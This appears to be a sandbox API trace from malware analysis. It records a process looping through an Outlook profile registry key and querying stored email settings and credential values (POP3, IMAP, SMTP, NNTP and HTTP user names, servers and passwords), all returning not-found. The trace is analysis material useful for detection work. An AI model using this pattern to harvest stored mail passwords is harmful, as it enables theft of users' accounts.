[0249.188] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.188] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.188] RegCloseKey (hKey=0x95c) returned 0x0 [0249.188] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.188] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.188] RegCloseKey (hKey=0x95c) returned 0x0 [0249.188] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.188] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.188] RegCloseKey (hKey=0x95c) returned 0x0 [0249.188] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.188] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.188] RegCloseKey (hKey=0x95c) returned 0x0 [0249.188] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.189] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.189] RegCloseKey (hKey=0x95c) returned 0x0 [0249.189] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.189] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.189] RegCloseKey (hKey=0x95c) returned 0x0 [0249.189] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.189] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.189] RegCloseKey (hKey=0x95c) returned 0x0 [0249.189] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.189] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.189] RegCloseKey (hKey=0x95c) returned 0x0 [0249.189] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.189] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.189] RegCloseKey (hKey=0x95c) returned 0x0 [0249.189] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.189] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.189] RegCloseKey (hKey=0x95c) returned 0x0 [0249.189] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.189] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.189] RegCloseKey (hKey=0x95c) returned 0x0 [0249.189] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.189] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.189] RegCloseKey (hKey=0x95c) returned 0x0 [0249.189] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.190] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.190] RegCloseKey (hKey=0x95c) returned 0x0 [0249.190] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.190] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.190] RegCloseKey (hKey=0x95c) returned 0x0 [0249.190] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.190] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.190] RegCloseKey (hKey=0x95c) returned 0x0 [0249.190] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.190] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.190] RegCloseKey (hKey=0x95c) returned 0x0 [0249.190] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.190] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.190] RegCloseKey (hKey=0x95c) returned 0x0 [0249.190] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.190] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.190] RegCloseKey (hKey=0x95c) returned 0x0 [0249.190] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.190] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.190] RegCloseKey (hKey=0x95c) returned 0x0 [0249.190] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.190] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.190] RegCloseKey (hKey=0x95c) returned 0x0 [0249.190] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.190] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.190] RegCloseKey (hKey=0x95c) returned 0x0 [0249.190] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.191] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.191] RegCloseKey (hKey=0x95c) returned 0x0 [0249.191] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.191] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.191] RegCloseKey (hKey=0x95c) returned 0x0 [0249.191] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.191] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.191] RegCloseKey (hKey=0x95c) returned 0x0 [0249.191] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.191] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.191] RegCloseKey (hKey=0x95c) returned 0x0 [0249.191] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.191] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.191] RegCloseKey (hKey=0x95c) returned 0x0 [0249.191] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.191] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.191] RegCloseKey (hKey=0x95c) returned 0x0 [0249.191] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.191] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.191] RegCloseKey (hKey=0x95c) returned 0x0 [0249.191] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.191] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.191] RegCloseKey (hKey=0x95c) returned 0x0 [0249.191] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.191] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.191] RegCloseKey (hKey=0x95c) returned 0x0 [0249.191] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.192] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.192] RegCloseKey (hKey=0x95c) returned 0x0 [0249.192] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.192] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.192] RegCloseKey (hKey=0x95c) returned 0x0 [0249.192] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.192] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.192] RegCloseKey (hKey=0x95c) returned 0x0 [0249.192] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.192] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.192] RegCloseKey (hKey=0x95c) returned 0x0 [0249.192] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.192] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.192] RegCloseKey (hKey=0x95c) returned 0x0 [0249.192] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.192] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.192] RegCloseKey (hKey=0x95c) returned 0x0 [0249.192] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.192] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.192] RegCloseKey (hKey=0x95c) returned 0x0 [0249.192] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.192] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.193] RegCloseKey (hKey=0x95c) returned 0x0 [0249.193] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.193] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.193] RegCloseKey (hKey=0x95c) returned 0x0 [0249.193] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.193] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.193] RegCloseKey (hKey=0x95c) returned 0x0 [0249.193] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.193] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.193] RegCloseKey (hKey=0x95c) returned 0x0 [0249.193] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.193] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.193] RegCloseKey (hKey=0x95c) returned 0x0 [0249.193] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.193] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.193] RegCloseKey (hKey=0x95c) returned 0x0 [0249.193] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.193] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.193] RegCloseKey (hKey=0x95c) returned 0x0 [0249.193] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.194] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.194] RegCloseKey (hKey=0x95c) returned 0x0 [0249.194] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.194] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.194] RegCloseKey (hKey=0x95c) returned 0x0 